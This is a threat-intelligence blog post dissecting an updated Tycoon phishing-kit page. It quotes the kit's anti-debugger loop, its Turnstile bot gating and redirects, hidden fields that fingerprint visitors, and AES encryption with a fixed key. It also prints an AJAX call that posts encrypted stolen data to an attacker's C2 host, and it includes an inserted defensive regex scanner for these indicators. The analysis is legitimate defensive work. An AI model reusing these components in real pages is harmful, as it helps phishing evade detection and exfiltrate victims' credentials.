PaaS Effective Anti-Bot Measures
Author: Joshua Rawles
Executive Summary
In recent investigations into advanced phishing techniques, we analysed current PhaaS portals and discovered new tactics employed by what appears to be an updated iteration of previously reported PhaaS platforms. Recent activity observed on Telegram coincided with the rollout of anti-bot measures, indicating ongoing enhancements to the kit's defense evasion.
During our analysis, attempts to probe the identified domains with URLSCAN yielded unexpected redirects to sites such as X, Amazon and Walmart. This anomaly prompted a deeper examination with the browser's debugger tools, which revealed simple but effective "anti-debugger" techniques that actively prevented in-browser debugging and thereby hindered further network request analysis. Subsequent analysis exposed several defense evasion techniques, including the deployment of Cloudflare Turnstile, dynamic URL generation, encryption mechanisms, and other methods designed to complicate automated detection.
Introduction
In the previous blogs on RaccoonO365 and Tycoon we explored sophisticated PhaaS portals and how they operate.
Recently I have come across some interesting tactics from what I believe to be an updated version of the previously discussed portals. This was confirmed to be updated Tycoon PhaaS pages.
I noticed that when inputting these domains into URLSCAN I was getting redirected to websites such as X, Amazon and Walmart.
This prompted me to have a look at the network tab in the browser and find out what was going on with the requests, as I was sure it was a phishing portal. I switched around VPNs until I finally got a hit.
When I landed on the page the classic Cloudflare Turnstile prompt appeared, so I went to open my debugger to look at the network requests and the source and see if it was the same portal as before. I was then hit with a "Paused in debugger".
Instead I decided to view the page source and saw the good old familiar atob-loaded script, but this time with a href too!
1st Stage Technical Overview
Before the Cloudflare Turnstile is even loaded, a fetch is made to a domain that appears to be randomly generated.
If the response from the generated URI is "0", the Turnstile API script is loaded. If the response is anything other than 0, the visitor is redirected to whichever href was loaded in that iteration of the page.
Let's break down the original script hosted at hxxps[://]jyr[.]yxnc2e[.]com/9ut47fy/ and explain the defense evasion techniques.
External Scripts
<script src="hxxps[://]code[.]jquery[.]com/jquery-3[.]6[.]0[.]min[.]js"></script>
<script src="hxxps[://]challenges[.]cloudflare[.]com/turnstile/v0/api[.]js?render=explicit"></script>
- jQuery: a JavaScript library for easier manipulation of HTML documents, event handling, and AJAX interactions.
- Cloudflare Turnstile: a CAPTCHA service provided by Cloudflare. Threat actors use it to hide the malicious server's real location and protect it from being taken down. In this instance it is also used to capture IPs and user agents and to generate certain redirects based on the outcome.
Meta Tags
<meta name="robots" content="noindex, nofollow">
- Tells search engines not to list the webpage in search results (noindex) and not to follow links on the page (nofollow). For a phishing page this keeps it out of search indexes and away from crawlers, reducing the chance that it is scraped or flagged.
Title
<title>Financial Forecasting</title>
- The title of the web page, which is randomly generated and appears as the name on the browser tab. I assume this is to make the website appear more legitimate, but it rings alarm bells for me when looking at it.
Content and Forms
<div id="fyiTYLznrz" class="container">
<div id="jOMXWdydWo" class="row justify-content-center">
<div class="text-center">
<form id="hIDPqGEvwc">
<div class="cf_turnstile" id="cf"></div>
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="My_IP_Address">
<input type="hidden" id="bltdref" name="bltdref" value="">
<input type="hidden" id="bltdua" name="bltdua" value="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0">
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
<div class="text-center" id="OJgDZbQiry">Your browser is being checked for secure online access.</div>
</div>
</div>
</div>
- Turnstile Information Gathering
- The hidden fields collect the visitor's IP address (bltdip), referrer (bltdref) and user agent (bltdua). This data helps the attackers understand their targets better and refine their approach. By understanding who is visiting the portal, they can tailor the attack and avoid detection.
Anti-Debugging Script
<script>
setInterval(() => {
const t0 = Date[.]now();
eval('debugger');
const t1 = Date[.]now();
}, 1000);
</script>
- Debugger Evasion
- Sets an interval that calls debugger every second. This is a simple tactic to prevent using the debugger view to check network requests, but it is very effective.
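Two things are worth noting about the loop above: the t0 and t1 timestamps are computed but never compared, so the script does not actually detect an open debugger, it simply pauses in one every second; and the pattern is small and stable enough to be matched statically. The following scanner is an added example (my code, not from the post or the kit) that runs over saved page source and reports the stage-1 indicators discussed in this section: the interval/debugger loop, Turnstile loaded in explicit mode, the hidden bltd* fingerprint fields and the noindex meta tag. The sample inputs are constructed from the snippets quoted in the post; the field names are the kit's as shown above.

```javascript
// Added example (not from the post or the kit): a static scanner for the stage-1
// evasion indicators described above, meant to run over saved page source.
// The sample inputs at the bottom are constructed from snippets quoted in the post.

const INDICATORS = [
  {
    name: 'anti-debugger-loop',
    // setInterval whose callback body contains a debugger statement (eval'd or bare)
    re: /setInterval\s*\(\s*(?:\(\s*\)\s*=>|function\s*\(\s*\))\s*\{[^}]*?\bdebugger\b[^}]*?\}\s*,\s*\d+\s*\)/,
  },
  {
    name: 'turnstile-explicit-render',
    // Turnstile loaded in explicit mode, so page script decides when (and if) to render it
    re: /challenges\.cloudflare\.com\/turnstile\/v0\/api\.js\?render=explicit/,
  },
  {
    name: 'hidden-fingerprint-fields',
    // hidden inputs pre-filled with IP / referrer / user agent before the form is posted
    re: /<input[^>]+type=["']hidden["'][^>]+name=["'](?:bltdip|bltdref|bltdua)["']/,
  },
  {
    name: 'noindex-nofollow',
    // robots meta tag keeping the page out of search indexes
    re: /<meta[^>]+name=["']robots["'][^>]+content=["'][^"']*noindex[^"']*["']/i,
  },
];

// Returns the names of every indicator found in `source`, in INDICATORS order.
function scanSource(source) {
  return INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.name);
}

// Simple verdict: the debugger loop alone is worth a look; the loop combined with
// Turnstile gating or fingerprint fields is the combination seen in this kit.
function assessSource(source) {
  const hits = scanSource(source);
  let verdict = 'clean';
  if (hits.includes('anti-debugger-loop') && hits.length >= 2) {
    verdict = 'likely-evasive-phishing';
  } else if (hits.length > 0) {
    verdict = 'review';
  }
  return { hits, verdict };
}

// Constructed sample: the stage-1 structure quoted in the post, with placeholder values.
const SAMPLE_STAGE1 = `
<meta name="robots" content="noindex, nofollow">
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
<form id="hIDPqGEvwc">
  <div class="cf_turnstile" id="cf"></div>
  <input type="hidden" id="bltdip" name="bltdip" value="203.0.113.10">
  <input type="hidden" id="bltdua" name="bltdua" value="Mozilla/5.0 (constructed)">
</form>
<script>
setInterval(() => {
  const t0 = Date.now();
  eval('debugger');
  const t1 = Date.now();
}, 1000);
</script>`;

// Constructed benign sample: an ordinary once-a-second interval with no debugger call.
const SAMPLE_BENIGN = `
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script>
setInterval(() => { document.title = new Date().toLocaleTimeString(); }, 1000);
</script>`;

console.log(assessSource(SAMPLE_STAGE1));
console.log(assessSource(SAMPLE_BENIGN));
```

The regexes are deliberately narrow heuristics (a callback with nested braces would slip past the first one), so treat a hit as a triage signal to be confirmed by looking at the page, not as a verdict on its own.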
CAPTCHA Rendering and Form Handling
<script>
turnstile[.]render('#cf', {
sitekey: '0x4AAAAAAAVDyhrZXvYXS92c',
'error-callback': vhtqxCDmsQ,
callback: wCfWGJmmQc,
});
function vhtqxCDmsQ() {
turnstile[.]reset();
}
function wCfWGJmmQc() {
var pdzpdargsQ = document[.]getElementById("hIDPqGEvwc");
pdzpdargsQ[.]onsubmit = function (event) {
event[.]preventDefault();
};
document[.]getElementById("pagelink").value = 'PHi2L8';
var yvCoBHOpZK = "../aj19N7hyvgtpgjFO8QBwMgMUViomWH6tKqTzJp70yo";
fetch(yvCoBHOpZK, {
method: "POST",
body: new FormData(pdzpdargsQ)
}).then(response => {
return response[.]json();
}).then(data => {
if(data['status'] == 'success'){
location[.]reload();
}
if(data['status'] == 'error'){
window[.]location[.]href = '/mwdjqzcvaurfWUAVTGpAPgi2CZylAidFgkoqsfmqxi?pbgzbsbVVJPKANNQRYZXYJLXDCVBSUCIPLGQLSHQBWUQEHVSLWPNWSZNNHBFPFFNYtblifkfpxmccettsshdagzyhapgqpvuqzkjuxwxalqecjclrhh';
}
});
}
</script>
CAPTCHA Integration (Turnstile):
- Presenting a CAPTCHA challenge inside the phishing site keeps automated analysis systems from reaching the page behind it.
Dynamic URL Generation:
- Generating URLs at runtime, such as the relative path stored in yvCoBHOpZK, is primarily used to evade detection by security systems. It is particularly effective at obscuring the true destinations of communication channels and infrastructure.
Response-Based Actions:
- The script acts on the server's feedback (data['status']). If the outcome signals success ('success'), the script refreshes the page (location.reload()), possibly to hide traces or adjust session details. If an error is returned ('error'), the browser is redirected to a predetermined URL (window.location.href). This redirection again serves to prevent automated analysis, since a human has to pass the Turnstile challenge to proceed to the phishing site.
Once the Cloudflare Turnstile is completed, or the initial fetch request decides you already have an active session, you are redirected to the actual phishing portal. At first glance this page uses the same anti-debugger tactic and fetches its content in a similar fashion.
By simply changing the document.write to a console.log again, we can view the 2nd-stage script being loaded.
2nd Stage Technical Overview
External Scripts
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cdn.socket.io/4.6.0/socket.io.min.js"></script>
<script src="https://github.com/fent/randexp.js/releases/download/v0.4.3/randexp.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script src="https://www.google.com/recaptcha/api.js"></script>
- jQuery: already explained in Stage 1.
- Socket.io: enables real-time bidirectional communication, facilitating dynamic updates to phishing pages and data exfiltration. This is also used for the data exfiltration previously described in the article Azure x11 Compromises = Tycoon.
- Randexp: generates random strings to mimic legitimate inputs, obscuring URLs and form fields to hide the origin of the infrastructure.
- CryptoJS: provides encryption for the transmission of stolen data and for evading detection.
- Google reCAPTCHA: used to fend off automated URL analysis systems from viewing the actual content of phishing pages; a reCAPTCHA barrier also increases the site's apparent credibility.
Encryption Method:
function encryptData(data) {
const key = CryptoJS.enc.Utf8.parse('1234567890123456');
const iv = CryptoJS.enc.Utf8.parse('1234567890123456');
const encrypted = CryptoJS.AES.encrypt(data, key, {
iv: iv,
padding: CryptoJS.pad.Pkcs7,
mode: CryptoJS.mode.CBC
});
return encrypted.toString();
}
- The CryptoJS library is used to conceal the information being sent to the C2 so that it cannot be read in transit by inspection tools, making traffic analysis difficult.
AJAX Requests to Suspicious URLs:
$.ajax({
url: 'hxxps[://]JFJR[.]ingstio[.]com/BnLdsMGSflTtxPOXqyOtMbkmYhZBOWIQRJTAPMHRBYZLXSXXWKNVYDUBTGWNNPCIPZLFMXOHGAHCU' + randroute,
type: 'POST',
data: { data: encrypteddata },
});
- This AJAX request sends the encrypted data (encrypteddata) to a dynamically generated URL. This is where the CryptoJS-encrypted variables are sent, and the responses that are loaded depend on the user's input.
Interval Debugger:
<script>
setInterval(() => {
const t0 = Date[.]now();
eval('debugger');
const t1 = Date[.]now();
}, 1000);
</script>
The same anti-debugger loop is present in the 2nd stage, just as before.
User Agent and Browser Detection
let userAgent = navigator.userAgent;
let browserName;
if (userAgent.match(/chrome|chromium|crios/i)) {
browserName = "chrome";
} else if (userAgent.match(/firefox|fxios/i)) {
browserName = "firefox";
} else if (userAgent.match(/safari/i)) {
browserName = "safari";
} else if (userAgent.match(/opr\//i)) {
browserName = "opera";
} else if (userAgent.match(/edg/i)) {
browserName = "edge";
} else {
browserName = "No browser detection";
}
- Identifies the user's browser in order to customise how responses and content are dynamically loaded.
Hidden Elements and Obfuscated Code:
<script>
var websitenames = ["godaddy"];
var capnum = 1;
var appnum = 1;
var view = "";
var pagelinkval = "PHi2L8";
var emailcheck = "0";
var webname = rtrim("/web8/", "/");
var urlo = "uhWaQBrcIdpa34BRhnzOaJ24edeMnemevnq4g5lxOGkEJX6fiGgujl";
var gdf = "ijiAiZUN09zeMhcs2taSdyzyPCNIsMOS8mcd120";
</script>
- Uses obfuscated variable names and random-looking values to obscure functionality and evade static analysis.
Disguised as Legitimate Service:
<div class="firstlogo"></div>
<img src="wxSjcYMP250FKktPTstJhYdOREbsOvO934130"/>
<body class="startnew" style="background-image: url('/mnDWOipXOpKswPVOYE9wkWp4PSYTDz58tzoijYGR9hPcRqERILLNIY9oKO5fxBZ7pEcwx220');">
- Utilizes images, logos, and background images that mimic a legitimate service, aiming to deceive users into believing the phishing site is authentic.
Conclusion
Our investigation reveals a notable evolution in phishing tactics, demonstrating how anti-debugging, CAPTCHA systems and dynamic URL generation are now used to evade detection effectively. Through the strategic deployment of Cloudflare turnstiles, attackers obscure their server locations while gathering vital IP and user-agent information. These tactics not only bolster the authenticity of phishing sites but also pose significant challenges for automated defense mechanisms, making it increasingly difficult for cybersecurity experts to detect and counteract such threats. As adversaries persist in advancing their methods, it becomes paramount for defenders to remain vigilant and implement proactive strategies to safeguard against these evolving tactics.